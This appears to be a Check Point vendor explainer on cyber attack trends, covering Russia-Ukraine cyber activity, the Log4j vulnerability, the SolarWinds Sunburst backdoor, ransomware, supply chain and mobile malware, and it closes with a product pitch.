A cyber attack is an assault launched by cybercriminals using one or more computers against a single or multiple computers or networks. A cyber attack can maliciously disable computers, steal data, or use a breached computer as a launch point for other attacks. Cybercriminals use a variety of methods to launch a cyber attack, including malware, phishing, ransomware, denial of service, among other methods.
Check Point Research (CPR) has released information on cyber attacks that have been seen in the context of the ongoing Russia-Ukraine conflict. In the first three days of battle, cyber attacks on Ukraine’s government and military sector increased by an astounding 196%. The number of cyber attacks on Russian businesses has climbed by 4%.
Phishing emails in East Slavic languages grew sevenfold, with a third of those malicious phishing emails being sent from Ukrainian email addresses to Russian receivers.
A severe remote code execution (RCE) vulnerability in the Apache logging package Log4j 2 versions 2.14.1 and below was reported on December 9th 2021 (CVE-2021-44228). With over 400,000 downloads from its GitHub repository, Apache Log4j is the most popular java logging package. It is used by a large number of enterprises throughout the world and allows users to log in to a variety of popular applications. It’s easy to exploit this flaw, which allows threat actors to take control of java-based web servers and perform remote code execution assaults.
The world is now facing what seems to be a 5th generation cyber-attack – a sophisticated, multi-vector attack with clear characteristics of the cyber pandemic. Named Sunburst by researchers, we believe this is one of the most sophisticated and severe attacks ever seen. The attack has been reported to impact major US government offices as well as many private sector organizations.
This series of attacks was made possible when hackers were able to embed a backdoor into SolarWinds software updates. Over 18,000 companies and government offices downloaded what seemed to be a regular software update on their computers, but was actually a Trojan horse. By leveraging a common IT practice of software updates, the attackers utilized the backdoor to compromise the organization’s assets enabling them to spy on the organization and access its data. For more information visit our Sunburst attack hub.
The resurgence of ransomware has been growing. Small local and state government agencies, mainly in the southeastern part of the U.S., have been victimized. Digital transformation is eroding traditional network perimeters with the adoption of cloud computing, cloud-based subscription services, and the ubiquity of mobile devices. This increased expansion of vectors means more ways to attack an organization.
In Q3 2020 Check Point Research saw a 50% increase in the daily average of ransomware attacks, compared to the first half of the year, Organizations worldwide were under a massive wave of ransomware attacks, with healthcare as the most targeted industry
As these attacks continue to mature both in frequency and intensity, their impact on business has grown exponentially. The Top ransomware types were Maze and Ryuk
Cyber threats of generation V and VI are now a reality for businesses. Cybercriminals are aware of recent advancements in company cybersecurity and have adapted their attacks to circumvent and defeat traditional safeguards. To avoid detection, modern cyber attacks are multi-vectored and use polymorphic code. As a result, detecting and responding to threats is more challenging than ever.
Cybercriminals’ primary target and an organization’s first line of defense in the remote work world is the endpoint. Securing the remote workforce necessitates an understanding of the most common cyber risks that employees experience, as well as endpoint security solutions capable of detecting, preventing, and resolving these assaults.
Cyberattacks come in a variety of different forms. Cybercriminals use many different methods to launch a cyber attack, a phishing attack, an exploitation of compromised credentials, and more. From this initial access, cybercriminals can go on to achieve different objectives including malware infections, ransomware, denial of service attack, data theft, and more.
Cyberattack trends change rapidly, and Check Point’s 2022 mid-year report examines the latest evolution of the cyber threat landscape.
In February 2022, Russia launched an invasion of Ukraine. This conflict used a variety of tactics, including attacks via land, sea, air, and cyberspace. Russia has a history of engaging in cyberattacks against Ukraine, including DDoS attacks and attacks against the country’s power infrastructure in 2015 and 2022.
With the invasion, cyberattacks — both official and unofficial — grew more common. On both sides of the conflict, volunteer troops launched various attacks against both military and civilian targets. Additionally, Russian APTs launched coordinated attacks to disrupt critical services within Ukraine. On the Ukrainian side, government representatives have officially requested and endorsed help with protecting the country’s critical infrastructure and launching attacks against Russian targets. While state-sponsored APTs have historically launched politically motivated attacks, this conflict led to the engagement of cybercriminals and individuals in cyberattacks as well.
Ransomware attacks have consistently grown to take on larger targets. Ransomware attacks began targeting individuals and moved to focus on large enterprises and organizations that can pay large ransoms. Recently, cyber threat actors have begun targeting entire countries with their attacks.
As these ransomware groups grow larger and more visible, they are increasingly linked to nation-states. Large-scale organizations launching attacks against countries are difficult to hide from governments, so cybercrime groups like Conti are increasingly aligning themselves politically with nation-states to continue operating. As the United States and other jurisdictions move to crack down on law enforcement, some countries selectively cooperate, protecting cybercrime groups whose activities coincide with political interests.
Supply chain attacks have become a top-of-mind security threat in recent years. Attacks such as those on SolarWinds and Kaseya brought them to prominence, and open-source software supply chain attacks pose a significant risk to organizations today.
However, near-universal adoption of cloud infrastructure — and the challenges that companies face securing their cloud environments — make cloud supply chain attacks a significant risk in the near future. Attacks against third-party providers enable an attacker to dramatically scale and increase the effects of their attacks, as demonstrated by the alleged March 2022 attack on Okta. Similar attacks against a cloud provider — such as AWS or Azure — would have a much more significant impact.
As companies become more reliant on mobile communication, cyberattacks increasingly target mobile devices. While the NSO Group’s Pegasus is the most famous threat to mobile devices, it is far from the only mobile malware. New mobile surveillance malware created by Cytrox and QuaDream have begun using the same techniques and providing the same capabilities as Pegasus. These three spyware variants have also begun using new vulnerabilities and exploits to evade new protections on iPhones.
In addition to spyware, sophisticated mobile malware such as Flubot and Malibot have begun building mobile device botnets using smishing and similar techniques. Cyber threat actors are also targeting official app stores with malware that masquerades as an antivirus, productivity tool, or other desirable application – and delivers infostealers, banking trojans, and other mobile malware.
Despite the prevalence of cyber attacks, Check Point data suggests that 99 percent of enterprises are not effectively protected. However, a cyber attack is preventable. The key to cyber defense is an end-to-end cyber security architecture that is multilayered and spans all networks, endpoint and mobile devices, and cloud. With the right architecture, you can consolidate management of multiple security layers, control policy through a single pane of glass. This lets you correlate events across all network environments, cloud services, and mobile infrastructures.
In addition to architecture, Check Point recommends these key measures to prevent cyber attacks:
Learn more about recent cyber attack trends by checking out Check Point’s 2021 Mid-Year Cyber Security Report. You’re also welcome to learn how to protect against modern cyber threats by signing up for a free demo of Check Point Harmony Endpoint.